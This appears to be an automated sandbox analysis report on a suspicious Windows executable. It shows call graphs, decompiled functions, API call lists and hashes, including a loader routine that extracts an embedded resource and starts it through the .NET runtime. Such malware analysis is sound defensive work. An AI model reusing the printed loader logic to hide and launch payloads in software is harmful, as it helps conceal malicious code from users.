__fassign 20 API calls 10263->10264 10265 4061d7 10264->10265 10266 403e03 __freea 20 API calls 10265->10266 10267 4061e2 10266->10267 10268 403e03 __freea 20 API calls 10267->10268 10269 4061ed 10268->10269 10270 403e03 __freea 20 API calls 10269->10270 10271 4061f8 10270->10271 10272 406153 __fassign 20 API calls 10271->10272 10273 406206 10272->10273 10274 406153 __fassign 20 API calls 10273->10274 10275 406214 10274->10275 10276 406153 __fassign 20 API calls 10275->10276 10277 406225 10276->10277 10278 406153 __fassign 20 API calls 10277->10278 10279 406233 10278->10279 10280 406153 __fassign 20 API calls 10279->10280 10281 406241 10280->10281 10282 403e03 __freea 20 API calls 10281->10282 10283 40624c 10282->10283 10284 403e03 __freea 20 API calls 10283->10284 10285 406257 10284->10285 10286 403e03 __freea 20 API calls 10285->10286 10287 406262 10286->10287 10288 403e03 __freea 20 API calls 10287->10288 10288->10254 10290 40618a 10289->10290 10291 40617a 10289->10291 10290->10258 10291->10290 10292 403e03 __freea 20 API calls 10291->10292 10292->10291 10293->10178 10333 4069ed 10294->10333 10297 406ada 10298 406ae6 _abort 10297->10298 10299 4043a4 _abort 20 API calls 10298->10299 10302 406b13 _abort 10298->10302 10306 406b0d _abort 10298->10306 10299->10306 10300 406b5f 10301 404831 __dosmaperr 20 API calls 10300->10301 10303 406b64 10301->10303 10311 406b8b 10302->10311 10350 405656 EnterCriticalSection 10302->10350 10347 404639 10303->10347 10306->10300 10306->10302 10307 406b42 10306->10307 10359 40aab9 10307->10359 10314 406bea 10311->10314 10317 406be2 10311->10317 10321 406c15 10311->10321 10351 40569e LeaveCriticalSection 10311->10351 10312 4036c9 _abort 28 API calls 10312->10314 10314->10321 10352 406ad1 10314->10352 10317->10312 10318 404320 _abort 38 API calls 10322 406c78 10318->10322 10320 406ad1 _abort 38 API calls 10320->10321 10355 406c9a 10321->10355 10322->10307 10323 404320 _abort 38 API calls 10322->10323 10323->10307 10325 40448b _abort ___scrt_get_show_window_mode 10324->10325 10326 4044b7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10325->10326 10328 404588 _abort 10326->10328 10327 4018cc _ValidateLocalCookies 5 API calls 10329 4045a6 10327->10329 10328->10327 10329->10062 10378 4034d8 10330->10378 10336 406993 10333->10336 10335 403e90 10335->10058 10335->10297 10337 40699f ___scrt_is_nonwritable_in_current_image 10336->10337 10342 405656 EnterCriticalSection 10337->10342 10339 4069ad 10343 4069e1 10339->10343 10341 4069d4 ___scrt_is_nonwritable_in_current_image 10341->10335 10342->10339 10346 40569e LeaveCriticalSection 10343->10346 10345 4069eb 10345->10341 10346->10345 10362 4045be 10347->10362 10349 404645 10349->10307 10350->10311 10351->10317 10353 404320 _abort 38 API calls 10352->10353 10354 406ad6 10353->10354 10354->10320 10356 406ca0 10355->10356 10358 406c69 10355->10358 10377 40569e LeaveCriticalSection 10356->10377 10358->10307 10358->10318 10358->10322 10360 4018cc _ValidateLocalCookies 5 API calls 10359->10360 10361 40aac4 10360->10361 10361->10361 10363 4043a4 _abort 20 API calls 10362->10363 10364 4045d4 10363->10364 10365 4045e2 10364->10365 10366 404633 10364->10366 10370 4018cc _ValidateLocalCookies 5 API calls 10365->10370 10373 404649 IsProcessorFeaturePresent 10366->10373 10368 404638 10369 4045be _abort 26 API calls 10368->10369 10371 404645 10369->10371 10372 404609 10370->10372 10371->10349 10372->10349 10374 404654 10373->10374 10375 40446f _abort 8 API calls 10374->10375 10376 404669 GetCurrentProcess TerminateProcess 10375->10376 10376->10368 10377->10358 10379 4034e4 _abort 10378->10379 10380 4034fc 10379->10380 10400 401dd9 GetModuleHandleW 10379->10400 10409 405656 EnterCriticalSection 10380->10409 10384 4035a2 10413 4035e2 10384->10413 10387 403504 10387->10384 10389 403579 10387->10389 10410 403bcd 10387->10410 10390 403591 10389->10390 10394 403424 _abort 5 API calls 10389->10394 10395 403424 _abort 5 API calls 10390->10395 10391 4035eb 10393 40aab9 _abort 5 API calls 10391->10393 10392 4035bf 10416 4035f1 10392->10416 10398 4035f0 10393->10398 10394->10390 10395->10384 10401 401de7 10400->10401 10401->10380 10402 403632 GetModuleHandleExW 10401->10402 10403 40365c GetProcAddress 10402->10403 10406 403671 10402->10406 10403->10406 10404 403685 FreeLibrary 10405 40368e 10404->10405 10407 4018cc _ValidateLocalCookies 5 API calls 10405->10407 10406->10404 10406->10405 10408 403698 10407->10408 10408->10380 10409->10387 10424 403906 10410->10424 10446 40569e LeaveCriticalSection 10413->10446 10415 4035bb 10415->10391 10415->10392 10447 405a93 10416->10447 10419 40361f 10422 403632 _abort 8 API calls 10419->10422 10420 4035ff GetPEB 10420->10419 10421 40360f GetCurrentProcess TerminateProcess 10420->10421 10421->10419 10423 403627 ExitProcess 10422->10423 10427 4038b5 10424->10427 10426 40392a 10426->10389 10428 4038c1 ___scrt_is_nonwritable_in_current_image 10427->10428 10435 405656 EnterCriticalSection 10428->10435 10430 4038cf 10436 403956 10430->10436 10434 4038ed ___scrt_is_nonwritable_in_current_image 10434->10426 10435->10430 10437 403976 10436->10437 10438 40397e 10436->10438 10439 4018cc _ValidateLocalCookies 5 API calls 10437->10439 10438->10437 10441 403e03 __freea 20 API calls 10438->10441 10440 4038dc 10439->10440 10442 4038fa 10440->10442 10441->10437 10445 40569e LeaveCriticalSection 10442->10445 10444 403904 10444->10434 10445->10444 10446->10415 10448 405ab8 10447->10448 10451 405aae 10447->10451 10449 4056b5 _abort 5 API calls 10448->10449 10449->10451 10450 4018cc _ValidateLocalCookies 5 API calls 10452 4035fb 10450->10452 10451->10450 10452->10419 10452->10420 11091 404429 11099 4057cc 11091->11099 11094 4043a4 _abort 20 API calls 11095 404445 11094->11095 11096 404452 11095->11096 11106 404455 11095->11106 11098 40443d 11100 4056b5 _abort 5 API calls 11099->11100 11101 4057f3 11100->11101 11102 40580b TlsAlloc 11101->11102 11103 4057fc 11101->11103 11102->11103 11104 4018cc _ValidateLocalCookies 5 API calls 11103->11104 11105 404433 11104->11105 11105->11094 11105->11098 11107 404465 11106->11107 11108 40445f 11106->11108 11107->11098 11110 405822 11108->11110 11111 4056b5 _abort 5 API calls 11110->11111 11112 405849 11111->11112 11113 405861 TlsFree 11112->11113 11114 405855 11112->11114 11113->11114 11115 4018cc _ValidateLocalCookies 5 API calls 11114->11115 11116 405872 11115->11116 11116->11107 11117 401e29 11118 401e39 11117->11118 11119 401e5e 11117->11119 11118->11119 11122 403dc2 11118->11122 11121 401e69 11123 403dce _abort 11122->11123 11124 404320 _abort 38 API calls 11123->11124 11127 403dd3 11124->11127 11125 403e8b _abort 38 API calls 11126 403dfd 11125->11126 11128 403e0e HeapFree 11126->11128 11132 403e37 __dosmaperr 11126->11132 11127->11125 11129 403e23 11128->11129 11128->11132 11130 404831 __dosmaperr 20 API calls 11129->11130 11131 403e29 GetLastError 11130->11131 11131->11132 11132->11121 11757 4015b0 11758 4015c0 11757->11758 11759 4015e0 11758->11759 11760 4015d9 LocalFree 11758->11760 11760->11759 11133 4c702b4 11134 4c702d2 SetCurrentDirectoryW 11133->11134 11136 4c70314 11134->11136 10475 4c7023e 10476 4c70293 10475->10476 10477 4c7026a DispatchMessageW 10475->10477 10476->10477 10478 4c7027f 10477->10478 11392 40333b 11393 403353 11392->11393 11394 40334d 11392->11394 11395 4032cc 20 API calls 11394->11395 11395->11393 11284 4072bc 11285 4072c9 11284->11285 11286 403ece _abort 20 API calls 11285->11286 11287 4072e3 11286->11287 11288 403e03 __freea 20 API calls 11287->11288 11289 4072ef 11288->11289 11290 403ece _abort 20 API calls 11289->11290 11294 407315 11289->11294 11292 407309 11290->11292 11291 405927 11 API calls 11291->11294 11293 403e03 __freea 20 API calls 11292->11293 11293->11294 11294->11291 11295 407321 11294->11295 11296 403cbf 11297 4025e3 ___vcrt_uninitialize 8 API calls 11296->11297 11298 403cc6 11297->11298

                          Control-flow Graph

                          C-Code - Quality: 100%
                          			E00401489() {
                          				void* _v8;
                          				struct HRSRC__* _t4;
                          				long _t10;
                          				struct HRSRC__* _t12;
                          				void* _t16;
                          
                          				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                          				_t12 = _t4;
                          				if(_t12 == 0) {
                          					L6:
                          					ExitProcess(0);
                          				}
                          				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                          				if(_t16 != 0) {
                          					_v8 = LockResource(_t16);
                          					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                          					_t13 = _v8;
                          					if(_v8 != 0 && _t10 != 0) {
                          						L00401000(_t13, _t10); // executed
                          					}
                          				}
                          				FreeResource(_t16);
                          				goto L6;
                          			}








                          0x0040149f
                          0x004014a5
                          0x004014a9
                          0x004014ec
                          0x004014ee
                          0x004014ee
                          0x004014b7
                          0x004014bb
                          0x004014c7
                          0x004014cd
                          0x004014d3
                          0x004014d8
                          0x004014e0
                          0x004014e0
                          0x004014d8
                          0x004014e6
                          0x00000000

                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                          • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                          • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                          • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                          • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                            • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                          • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                          • ExitProcess.KERNEL32 ref: 004014EE
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                          • String ID: v2.0.50727
                          • API String ID: 2372384083-2350909873
                          • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                          • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                          • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                          • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 63 2553850-2553860 64 2553862-2553879 63->64 65 25538cd-2553955 call 2552c58 63->65 73 255387b-2553895 64->73 88 2553917-2553957 65->88 89 2553959-255397f 65->89 81 2553893-255389d 73->81 82 255389f-25538a2 73->82 81->73 81->82 85 25538a4-25538bf 82->85 86 25538c2-25538cc 82->86 85->86 88->89 96 2553926-2553936 88->96 94 2553985-25539de 89->94 95 2553a4a-2553a96 89->95 94->95 111 25539ac-25539b4 94->111 116 2553a98-2553a9b 95->116 96->89 99 2553938-2553945 96->99 99->89 102 2553947-2553952 99->102 111->95 113 25539ba-25539d2 111->113 115 2553a3c-2553a3e 113->115 119 25539e0-25539e6 115->119 120 2553a40-2553a49 115->120 117 2553a9d-2553ab1 116->117 118 2553af9-2553b2f 116->118 123 2553ab7-2553ac5 117->123 124 2553ab3-2553ab5 117->124 129 2553b36-2553b3a 118->129 130 2553b31 118->130 121 2553a02-2553a14 119->121 122 25539e8-25539fc 119->122 121->95 126 2553a16-2553a2f 121->126 122->121 136 2553ae5-2553aec 123->136 137 2553ac7-2553ada 123->137 124->123 127 2553aef-2553af3 124->127 126->95 131 2553a31-2553a3b 126->131 127->116 128 2553af5-2553af7 127->128 128->116 134 2553b40-2553b49 129->134 135 2553d2a-2553d3d 129->135 133 2553d22-2553d29 130->133 131->115 139 2553b57-2553bc5 134->139 140 2553b4b-2553b4d 134->140 143 2553d62-2553d64 135->143 144 2553d3f-2553d51 135->144 137->136 138 2553adc 137->138 138->136 139->135 150 2553b6f-2553bd2 139->150 140->139 148 2553d66-2553d6c 143->148 149 2553d72-2553d8f 143->149 146 2553d53-2553d55 144->146 147 2553d5d-2553d60 144->147 146->147 147->143 148->149 151 2553d95-2553d9e 149->151 152 2553f6d-2553f85 149->152 193 2553b97-2553bdf 150->193 154 2553da4-2553dad 151->154 155 2553e71-2553e75 151->155 163 2553f87-2553fa7 152->163 164 2553faa-2553fb9 152->164 154->152 158 2553db3-2553dbc 154->158 159 2553e77-2553e83 155->159 160 2553e9b-2553ea4 155->160 165 2553dc2-2553dce 158->165 166 2553e4d-2553e56 158->166 159->152 167 2553e89-2553e99 159->167 161 2553ea6-2553eb9 160->161 162 2553ebc-2553ec2 160->162 161->162 168 2553ec5-2553ece 162->168 163->164 178 2553fcf-2553ff0 164->178 179 2553fbb 164->179 165->152 171 2553dd4-2553dff 165->171 166->152 169 2553e5c-2553e6b 166->169 167->168 168->152 173 2553ed4-2553ee6 168->173 169->154 169->155 171->166 181 2553e01-2553e08 171->181 173->152 177 2553eec-2553efc 173->177 177->152 183 2553efe-2553f0e 177->183 185 2553fbe-2553fc0 179->185 188 2553e14-2553e1d 181->188 189 2553e0a 181->189 183->152 191 2553f10-2553f2a 183->191 186 2553ff1-255402c 185->186 187 2553fc2-2553fcd 185->187 203 2554033-255403a 186->203 204 255402e 186->204 187->178 187->185 188->152 192 2553e23-2553e48 188->192 189->188 191->152 194 2553f2c-2553f57 191->194 214 2553f63-2553f6a 192->214 213 2553d16-2553d1c 193->213 194->152 212 2553f59-2553f60 194->212 215 2554043-255408f call 25523a0 203->215 216 255403c 203->216 207 25540c1-25540c8 204->207 212->214 213->133 217 2553be1-2553bf1 213->217 215->207 216->215 217->135 219 2553bf7-2553c01 217->219 221 2553c03-2553c05 219->221 222 2553c0f-2553c20 219->222 221->222 222->135 224 2553c26-2553c30 222->224 225 2553c32-2553c34 224->225 226 2553c3e-2553c4e 224->226 225->226 226->135 228 2553c54-2553c5a 226->228 230 2553c74-2553c80 228->230 231 2553c5c-2553c62 228->231 230->135 232 2553c86-2553d12 230->232 233 2553c64 231->233 234 2553c66-2553c72 231->234 232->213 233->230 234->230
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID: >_kq
                          • API String ID: 0-4149988037
                          • Opcode ID: 9c13271f80586823547e62fd573edc33fa8a4a3cf276c905bc28ab34a418f7f2
                          • Instruction ID: 546408dfc1796058097e382758d689d8546cc293804e59fba92dd2619eef9da9
                          • Opcode Fuzzy Hash: 9c13271f80586823547e62fd573edc33fa8a4a3cf276c905bc28ab34a418f7f2
                          • Instruction Fuzzy Hash: 8F42D371A04226DFCB15CF68C4A49A9BFB2FF85350B1985EAEC099F216C731EC45CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 348 401e1d-401e28 SetUnhandledExceptionFilter
                          C-Code - Quality: 100%
                          			E00401E1D() {
                          				_Unknown_base(*)()* _t1;
                          
                          				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                          				return _t1;
                          			}




                          0x00401e22
                          0x00401e28

                          APIs
                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                          Memory Dump Source
                          • Source File: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                          • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                          • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                          • Instruction Fuzzy Hash:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 020279e0d236c5e0a3c0ff34d622bd866ea5607429bcc6496a6637c3d6a0fe2c
                          • Instruction ID: acbeaea2775a0ffa45a81ea8ff9fb7bd0942d2870cc34b62db93ae2336d0a29c
                          • Opcode Fuzzy Hash: 020279e0d236c5e0a3c0ff34d622bd866ea5607429bcc6496a6637c3d6a0fe2c
                          • Instruction Fuzzy Hash: CC12BC70A04225CFDB24CF79D4A86ADBBF2BF88314F14896ADC06DB255DBB49C85CB44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ac290053b65ead51e95a76bced9c97b9fba2a5453faa458d7958d6bed135f46
                          • Instruction ID: 74e48b6ef03761b688bf26e0ad6a38988aff48c06f10469681a09a68212d6875
                          • Opcode Fuzzy Hash: 9ac290053b65ead51e95a76bced9c97b9fba2a5453faa458d7958d6bed135f46
                          • Instruction Fuzzy Hash: DC81B032F01525ABD714DBA8D854A6EBBF3AFC4350F2984A5D809EB365DE30DC41CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c1f5ee8d24f2582e7ad8a36e78c8772b15847436cfed8c189aee561888275b7
                          • Instruction ID: 7047a41e21df9db97532f85cfc1b215cbcca9693a27c39cf424d0ea83dbf31ec
                          • Opcode Fuzzy Hash: 7c1f5ee8d24f2582e7ad8a36e78c8772b15847436cfed8c189aee561888275b7
                          • Instruction Fuzzy Hash: C0517B32F015259BD714DB69C894B5EB7E3AFC8350F2AC1A5E809EB369DE34DC418B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004055C5(void* __ecx) {
                          				void* _t6;
                          				void* _t14;
                          				void* _t18;
                          				WCHAR* _t19;
                          
                          				_t14 = __ecx;
                          				_t19 = GetEnvironmentStringsW();
                          				if(_t19 != 0) {
                          					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
                          					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
                          					_t18 = _t6;
                          					if(_t18 != 0) {
                          						E0040ACF0(_t18, _t19, _t12);
                          					}
                          					E00403E03(0);
                          					FreeEnvironmentStringsW(_t19);
                          				} else {
                          					_t18 = 0;
                          				}
                          				return _t18;
                          			}







                          0x004055c5
                          0x004055cf
                          0x004055d3
                          0x004055e4
                          0x004055e8
                          0x004055ed
                          0x004055f3
                          0x004055f8
                          0x004055fd
                          0x00405602
                          0x00405609
                          0x004055d5
                          0x004055d5
                          0x004055d5
                          0x00405614

                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                          Memory Dump Source
                          • Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnvironmentStrings$Free
                          • String ID:
                          • API String ID: 3328510275-0
                          • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                          • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                          • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                          • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 22 2552d58-2552d8a 26 2552d91 22->26 27 2552d8c 22->27 60 2552d91 call 2552ec0 26->60 61 2552d91 call 2552d58 26->61 62 2552d91 call 2552d48 26->62 28 2552e9d-2552ea4 27->28 29 2552d97-2552d99 30 2552da0-2552e13 29->30 31 2552d9b 29->31 35 2552ea7-2552ec2 30->35 36 2552dbf-2552dc9 30->36 31->28 40 2552ec9-2552ecb 35->40 36->35 37 2552dcf-2552dd9 36->37 37->35 39 2552ddf-2552de9 37->39 39->35 41 2552def-2552e22 39->41 43 2552ed1-2552ed7 40->43 44 2552ecd-2552ed0 40->44 52 2552e76-2552e7a 41->52 53 2552e24-2552e39 52->53 54 2552e7c 52->54 53->35 55 2552e3b-2552e67 53->55 56 2552e7e-2552e80 54->56 55->35 57 2552e69-2552e73 55->57 56->35 58 2552e82-2552e8c 56->58 57->52 58->56 59 2552e8e-2552e9a 58->59 59->28 60->29 61->29 62->29
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID: $>_kq
                          • API String ID: 0-1412446344
                          • Opcode ID: 5ab315a501456d4d94c8ab1c168d8453a1e12ec900f6157623175653bd8109db
                          • Instruction ID: 08533735fa91c7ceeabb26b3744c000ebcb4248e86fdb0ab7cac57b420e91b42
                          • Opcode Fuzzy Hash: 5ab315a501456d4d94c8ab1c168d8453a1e12ec900f6157623175653bd8109db
                          • Instruction Fuzzy Hash: 8341A270E082658BCB24CB69C8945BEBB63BBC5214F298967CC55DB605C731E853CB86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 245 4c70508-4c70512 246 4c70514 245->246 247 4c7049f-4c704a9 245->247 250 4c70516-4c7052c 246->250 251 4c7052e-4c70576 246->251 248 4c704ab-4c704b3 CreateMutexW 247->248 249 4c704fa-4c704ff 247->249 255 4c704b9-4c704cf 248->255 249->248 250->251 253 4c705a3-4c705a8 251->253 254 4c70578-4c7058b 251->254 253->254 262 4c7058d-4c705a0 254->262 263 4c705aa-4c705af 254->263 257 4c70501-4c70506 255->257 258 4c704d1-4c704f7 255->258 257->258 263->262
                          APIs
                          • CreateMutexW.KERNELBASE(?,?), ref: 04C704B1
                          Memory Dump Source
                          • Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CreateMutex
                          • String ID:
                          • API String ID: 1964310414-0
                          • Opcode ID: 082e444584497a487279da2e465c39fd0c53745882e6ce9f45ae6aea43e61a2a
                          • Instruction ID: 2bf278db3b558627f4e66dd5bf5e2b4345c64e057d34a3578151e1f3bbf03f4e
                          • Opcode Fuzzy Hash: 082e444584497a487279da2e465c39fd0c53745882e6ce9f45ae6aea43e61a2a
                          • Instruction Fuzzy Hash: 2F31A2764057809FE751CF15D889B66BFE4FF06324F0880AADD888F263D375A949CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 266 4c70416-4c7048d 270 4c70492-4c7049b 266->270 271 4c7048f 266->271 272 4c704a0-4c704a9 270->272 273 4c7049d 270->273 271->270 274 4c704ab-4c704cf CreateMutexW 272->274 275 4c704fa-4c704ff 272->275 273->272 278 4c70501-4c70506 274->278 279 4c704d1-4c704f7 274->279 275->274 278->279
                          APIs
                          • CreateMutexW.KERNELBASE(?,?), ref: 04C704B1
                          Memory Dump Source
                          • Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CreateMutex
                          • String ID:
                          • API String ID: 1964310414-0
                          • Opcode ID: 150ecd7b7460acd692abc1b9165e29fd69509f6578e268de654b9e69756d5775
                          • Instruction ID: a0af58ba817ea50a50985725e3568071af449e251ed990ccb388b4ddf129af44
                          • Opcode Fuzzy Hash: 150ecd7b7460acd692abc1b9165e29fd69509f6578e268de654b9e69756d5775
                          • Instruction Fuzzy Hash: E03164715057806FE721CF65CC85F56FFE8EF05310F08849AE9859B292D365E904C765
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 282 4c7043e-4c7048d 285 4c70492-4c7049b 282->285 286 4c7048f 282->286 287 4c704a0-4c704a9 285->287 288 4c7049d 285->288 286->285 289 4c704ab-4c704cf CreateMutexW 287->289 290 4c704fa-4c704ff 287->290 288->287 293 4c70501-4c70506 289->293 294 4c704d1-4c704f7 289->294 290->289 293->294
                          APIs
                          • CreateMutexW.KERNELBASE(?,?), ref: 04C704B1
                          Memory Dump Source
                          • Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CreateMutex
                          • String ID:
                          • API String ID: 1964310414-0
                          • Opcode ID: 740b438ef2723bbd9e4d5dfcd11483eadbba7669ef05989f3358c092a2e7c263
                          • Instruction ID: 6ae292510591958a5f547a284381390a62aafabdeb4f78d655e8b98e0074f3f1
                          • Opcode Fuzzy Hash: 740b438ef2723bbd9e4d5dfcd11483eadbba7669ef05989f3358c092a2e7c263
                          • Instruction Fuzzy Hash: EC217FB1640740AFE721CF2ACC85B66FBE8EF04320F08846AE9459B242E675F504CB75
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 297 4c70205-4c70268 299 4c70293-4c70298 297->299 300 4c7026a-4c7027d DispatchMessageW 297->300 299->300 301 4c7027f-4c70292 300->301 302 4c7029a-4c7029f 300->302 302->301
                          APIs
                          • DispatchMessageW.USER32(?), ref: 04C70270
                          Memory Dump Source
                          • Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: DispatchMessage
                          • String ID:
                          • API String ID: 2061451462-0
                          • Opcode ID: dd592d43d1feec52f94800ab874218df02d4e751a1e032b2c358fd409030305f
                          • Instruction ID: e1c7882a70d53275fa9301b488f0fac62b4faaf2f119306863de7a1ee97b9d71
                          • Opcode Fuzzy Hash: dd592d43d1feec52f94800ab874218df02d4e751a1e032b2c358fd409030305f
                          • Instruction Fuzzy Hash: EF117C7540D7C0AFD7128F259C44B62BFB4EF47624F0980DAED848F263D265A908CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 305 4c702b4-4c702f6 307 4c702fb-4c70304 305->307 308 4c702f8 305->308 309 4c70306-4c7030e SetCurrentDirectoryW 307->309 310 4c70345-4c7034a 307->310 308->307 311 4c70314-4c70326 309->311 310->309 313 4c7034c-4c70351 311->313 314 4c70328-4c70344 311->314 313->314
                          APIs
                          • SetCurrentDirectoryW.KERNELBASE(?), ref: 04C7030C
                          Memory Dump Source
                          • Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CurrentDirectory
                          • String ID:
                          • API String ID: 1611563598-0
                          • Opcode ID: 29001acf005d97dd65987f66bea5171321f8ba138f40bcda328c6ce0baba1b0a
                          • Instruction ID: 5521e110d78e72906b509b3e0efc98c2a3a116e785f8dd60fcb175fbd5271c65
                          • Opcode Fuzzy Hash: 29001acf005d97dd65987f66bea5171321f8ba138f40bcda328c6ce0baba1b0a
                          • Instruction Fuzzy Hash: 071173725093809FD751CF66DC85B56BFE8EF46220F0884AAED49CF252D274E948CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
